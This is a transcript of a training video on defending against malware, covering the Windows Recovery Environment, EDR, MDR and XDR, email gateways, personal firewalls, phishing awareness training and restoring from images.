Security professionals have many tools available to combat malware. In this video, you’ll learn about the Windows Recovery Environment (WinRE), Endpoint Detection and Response (EDR), email gateways, software firewalls, and more.
When you’re troubleshooting malware problems, you may find that your operating system is difficult to use, or it may not start at all. But there may be times when you need to recover certain files from this system before wiping it completely to remove the malware.
In order to gain access to the operating system, you might want to try using the Windows Recovery Environment. This provides you with a command prompt that allows you access to the file system before it loads the Windows operating system.
This is a powerful prompt that gives you full access to all of the files and the entire operating system, so you have to be very careful about the things that you’re changing in the Windows Recovery Environment. From this command prompt, you can start or stop different services. You can modify what starts up when the operating system begins. And you could certainly run any type of uninstall application from this command prompt to remove the malicious software.
This is one of the reasons why we spend so much time in this course, talking not only about the graphical Windows system, but also the things that you can do at a command prompt. From the Windows Recovery Environment, we can copy files, rename information, or move these files to a different part of the file system.
We can enable or disable services or modify what applications are starting, when you launch the Windows operating system. Or if you are having problems with the file system, the boot sector, or any other part of the startup process, you can modify, troubleshoot, and make changes to that part of the operating system from this Windows Recovery Environment.
If you have the installation media you used to install Windows, you can boot to that installation media and start the Windows Recovery Environment. Or if you’re already in Windows, you can choose to restart. And while you choose the Restart option, hold down the Shift key. When the system starts back up, it will launch the Recovery Environment options.
If you’re running Windows 10, you can go to the Settings app, this is under Update and Security. There’s a Recovery option. And you can choose Advanced Startup, and click the button to Restart Now. If you’re running Windows 11, it’s very similar. You still go to the system app. You go to the Recovery option under Advanced Startup. And you choose the option to Restart Now.
Here’s my Windows 11 desktop. We’ll go down to the search, and we’ll type S-E-T-T-I-N. And then it finishes up with the Settings app right at the top. Once we start the Settings app, if we scroll down just a bit, you’ll see the option for Recovery. If we click the Recovery option, there’s a link for Advanced Startup. And we can click the button to Restart Now.
A dialog box appears reminding us that we are going to restart the system right now. So if you have anything that you need to save, make sure you do that before clicking the Restart Now button. Windows then goes through the standard restart process, and everything at this point looks relatively normal.
Here’s the Windows Recovery Environment for Windows 11. From here, we can continue to Windows 11. Turn off your PC, use a device, or, in this case, we will choose Troubleshoot. From here, we can reset this PC that lets you keep or remove your personal files and reinstall the Windows operating system. But in this case, we’re going to choose Advanced Options.
Here are the options for Startup Repair, the installation of updates, Startup Settings, any firmware settings for the UEFI BIOS, and the option that we’re going to use, which is Command Prompt. Clicking on that puts you at the Command Prompt. And from here, you have full access to the Windows operating system.
Over the last number of years, our anti-malware and antivirus software has been evolving to make our systems more secure, while at the same time the number of threats continues to scale upward. One of these improvements is the Endpoint Detection and Response Software, or EDR.
This is software that can detect malicious code without specifically using a signature. It performs behavioral analysis. It does machine learning. It might even monitor all of the processes on your system. And if it identifies anything that does not look normal, it will stop that software from running.
This also collects information about the software that it’s seeing so that you can perform a root cause analysis to determine how that software originally got on the system. And, of course, it provides you with tools you can use to respond to any particular threat. It can isolate this system automatically, quarantine the threat that it is found, and automatically rollback to a previous configuration.
This allows your users to keep operating. The systems continue to be up and running. But in the background, we’re still providing security to prevent this type of malware from executing.
Many organizations will have a third-party manage this process of monitoring for malicious software. In that case, this third-party EDR service is referred to as a Managed Detection and Response, or MDR. You’ll often see an MDR provided by a Managed Security Service Provider, or MSSP. They are responsible for monitoring all of your systems. And if they detect any threats to these systems, they react on your behalf.
The MSSP often has professionals on staff that understand the intricacies of malicious software. And they can use that knowledge across all of their different customers systems. This allows your in-house security team to manage the more important security issues, while third party takes care of the detection and response of any malicious software.
EDR and MDR were created to focus on the individual devices. But as we all know, today’s malware can affect more than just a single computer and often involves many different aspects of the infrastructure.
To bring all of those different devices and endpoints into a complete view of what’s happening on your network, we’ve created Extended Detection and response, or XDR. Not only are we now watching individual endpoints, we’re now watching the traffic traversing the network to be able to identify malicious software at a completely different level.
This also begins collecting data from all of these different points and bringing them back to one central database where we can perform correlation analysis. So now we can examine and correlate between endpoints, network data, and cloud data to be able to identify where this malicious software might be and how to prevent it in the future.
If you’re managing a relatively small network or a network that is just your systems at home, you’re probably just using antivirus and anti-malware software. These usually run as real-time options on your system, so it is constantly watching everything that you’re doing. And if you happen to download something that is deemed to be malicious, it will be identified immediately by this real-time scanner.
We are starting to see enhancements to a number of antivirus and anti-malware software suites, where they’re able to identify malicious actions that are outside the scope of a signature. So if there is something occurring on your system that clearly was created because of something malicious, your antivirus and anti-malware software can stop it in its tracks.
Email is a very popular vector for attacks. We can send information in an email message to get someone to click on a malicious link. Or maybe we attach the malicious software to the email message itself.
For that reason, many organizations will monitor all of their email transactions and look for any type of malicious software or malicious information that is contained within these email messages. Most networks will have a mail gateway where all of their mail is sent, so anything from outside the internet that is inbound to your users generally will pass through a firewall and then to an internal mail gateway.
Once that mail is scanned and everything is approved, it can then be forwarded on to an internal mail server and distributed to your end users. Many organizations have also moved that mail gateway into the cloud.
So now we have a powerful cloud-based email gateway that is collecting information from hundreds or even thousands of different email systems and is able to find that malicious software much easier and be able to react in a centralized cloud-based system.
Many organizations will also enable Windows Defender Firewall or some type of third-party firewall on all of their endpoint devices. This personal firewall will monitor all network communication in and out of this system and will identify anything that is not allowed to communicate to that endpoint.
This is especially important if malware does find a way to get installed onto that operating system. Many malware variants will attempt to communicate outside of your network to the internet, where there might be a command and control server. This type of software-based firewall can monitor for any of those transactions and stop that communication before it leaves that endpoint.
Most operating systems will include a software-based firewall, and it’s always a good idea to enable it and have it running all the time. This allows you to have a process that is constantly watching the network communication over your network. And if there is unexpected network traffic from malware or from any source, the personal firewall will identify it, alert, and then block it from communicating.
One type of attack that is extremely difficult to identify through electronic means is social engineering. This is one of the reasons that phishing attacks are so successful because they’re able to circumvent our technology and attack the people within our organization directly.
This is why many organizations have extensive training on phishing. They want to be sure that all of their employees know exactly what this threat might be and how to react if they identify that threat on their system.
To see if their end users really do remember their training, many organizations will test their users by sending a phishing email and see if anybody happens to click on those internal links. This is something that can be easily reported on. And if someone does happen to click a link and provide their private information, it may be time for some additional training.
Training for security concerns can be more than just looking for phishing attacks. It can be for any type of attack that might occur to your systems. And end user training can take many different forms as well.
We can certainly have one-on-one training where one person is explaining to another individual this type of security issue and how to resolve it. Or we might have posters and signs. So anytime someone walks into the building, they can see information on how to better protect their system.
Some organizations will have a message board or internal forums, which may also be a good way to inform your user community of any urgent threats. This might also be included with a login message. So when somebody pops open a login screen, they’ll be able to see the message of the day and know what the important concerns might be regarding IT security. And most organizations will have an intranet or some type of centralized web services, and this is also a great place to store documentation and provide additional details on IT security.
Although many people will go through a process of trying to remove malware from a system, the only way to be 100% sure that you have removed all of that malware is to completely delete that system and restore it from a known good backup or a known good image. If you do have a known good backup, this is a very quick way to restore, especially if it’s in an image form where you can simply have the entire system wiped and then restore it with a complete duplicate of what was there originally.
Restoring from backup is a relatively fast way to get a system back up and running, but you are limited to the last date that you made that backup. So if the backup was made 24 hours ago, you might be missing some of the work that you’ve done in that last 24 hours.
One of the slowest forms of restoring a system would be a manual restoration, where you manually install Windows and then go through the process of manually installing any applications required by that user. And the way that many organizations will perform this restoration is by using an image. They’ve created a predefined configuration for that system that they can easily copy down that includes the operating system and all required applications.
Since many organizations will keep their user data on a network share, deleting everything on a local system and restoring from an image provides you a way to get that system back up and running as quickly as possible.